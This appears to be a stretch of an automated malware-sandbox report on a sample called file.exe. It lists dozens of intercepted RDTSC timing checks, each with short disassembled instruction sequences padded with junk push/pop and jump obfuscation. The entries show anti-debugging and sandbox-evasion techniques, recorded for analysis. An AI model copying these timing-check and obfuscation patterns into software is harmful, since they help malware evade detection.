                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C3F4 second address: A6C418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0B08CB6D29h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75CC9 second address: A75CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75CCF second address: A75CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A78115 second address: A7811E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7811E second address: A78122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF3E3 second address: 9DF403 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B09070BCFh 0x00000008 jmp 00007F0B09070BCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7AD02 second address: A7AD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81319 second address: A81328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jbe 00007F0B09070BC6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81328 second address: A8132C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8132C second address: A81332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2CAAF second address: A2CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 sbb dl, FFFFFFD1h 0x0000000b push 00000004h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0B08CB6D18h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov dword ptr [ebp+122D359Bh], edx 0x0000002d mov dword ptr [ebp+122D2855h], esi 0x00000033 nop 0x00000034 pushad 0x00000035 jc 00007F0B08CB6D1Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A815E1 second address: A815ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A815ED second address: A81608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81608 second address: A81621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B09070BD3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81773 second address: A81779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85608 second address: A85614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0B09070BC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85614 second address: A8561D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85DFE second address: A85E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85E04 second address: A85E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8917B second address: A89193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD3h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89193 second address: A891A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A891A1 second address: A891AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A891AB second address: A891B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A888BD second address: A888C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A888C1 second address: A888C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A888C5 second address: A888CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88B50 second address: A88B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88B54 second address: A88B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0B09070BC8h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88B67 second address: A88B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0B08CB6D16h 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jmp 00007F0B08CB6D1Ch 0x00000014 pop ebx 0x00000015 jne 00007F0B08CB6D27h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88EB6 second address: A88EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E460 second address: A8E466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E466 second address: A8E46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E5E7 second address: A8E5F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0B08CB6D16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EFBE second address: A8EFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F0B09070BCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EFCC second address: A8EFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EFD0 second address: A8EFD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F266 second address: A8F27C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0B08CB6D22h 0x0000000e jnc 00007F0B08CB6D16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F27C second address: A8F280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A95853 second address: A95865 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A95865 second address: A9586A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9586A second address: A9587A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B08CB6D16h 0x0000000a jbe 00007F0B08CB6D16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9877F second address: A98783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A98A33 second address: A98A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B08CB6D1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A98A41 second address: A98A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A98F9E second address: A98FA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A98FA2 second address: A98FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B09070BC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F0B09070BD3h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A99172 second address: A99177 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A992F3 second address: A992F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A992F8 second address: A992FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A992FF second address: A99308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A99308 second address: A9930C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1C9E second address: AA1CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F0B09070BC8h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F0B09070BC6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1CB8 second address: AA1CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0B08CB6D26h 0x0000000b jo 00007F0B08CB6D16h 0x00000011 jng 00007F0B08CB6D16h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1CE7 second address: AA1CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1CED second address: AA1CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA00CD second address: AA00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA00D1 second address: AA00D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0658 second address: AA065E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA065E second address: AA0669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0B08CB6D16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0669 second address: AA0676 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0B09070BC8h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0676 second address: AA067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0BF3 second address: AA0BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0BF9 second address: AA0BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0BFF second address: AA0C17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jnp 00007F0B09070BC6h 0x00000014 pop ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0C17 second address: AA0C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0B08CB6D16h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0B08CB6D24h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1440 second address: AA1444 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA1444 second address: AA1448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FA98 second address: A9FA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FA9D second address: A9FAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FAA3 second address: A9FAAD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B09070BC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FAAD second address: A9FAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA4E83 second address: AA4EA0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0B09070BD3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA4EA0 second address: AA4EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0B08CB6D16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA4EAB second address: AA4EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0B09070BC6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F0B09070BC6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA9533 second address: AA9581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnc 00007F0B08CB6D2Ch 0x0000000d popad 0x0000000e push esi 0x0000000f pushad 0x00000010 jmp 00007F0B08CB6D24h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jmp 00007F0B08CB6D1Dh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA9581 second address: AA9585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA9585 second address: AA9589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0116 second address: AB011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB011A second address: AB0125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB0125 second address: AB012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB012B second address: AB0130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABCD88 second address: ABCD8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABCD8D second address: ABCDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jo 00007F0B08CB6D24h 0x0000000f jmp 00007F0B08CB6D1Eh 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jl 00007F0B08CB6D31h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABCDB6 second address: ABCDC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABC913 second address: ABC919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABC919 second address: ABC942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0B09070BD4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABC942 second address: ABC948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABC948 second address: ABC96E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0B09070BD7h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACE56E second address: ACE57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0B08CB6D16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2CE8 second address: AD2D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B09070BC6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007F0B09070BCCh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2D05 second address: AD2D12 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2D12 second address: AD2D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2E79 second address: AD2E7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2E7D second address: AD2E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B09070BD0h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2E99 second address: AD2EB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D27h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2EB4 second address: AD2EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F0B09070BD3h 0x0000000f jmp 00007F0B09070BD6h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0B09070BCBh 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2EF7 second address: AD2F01 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2F01 second address: AD2F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2F07 second address: AD2F11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD2F11 second address: AD2F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0B09070BC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD337B second address: AD3381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD3381 second address: AD33AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0B09070BD8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0B09070BC6h 0x00000014 jne 00007F0B09070BC6h 0x0000001a rdtsc
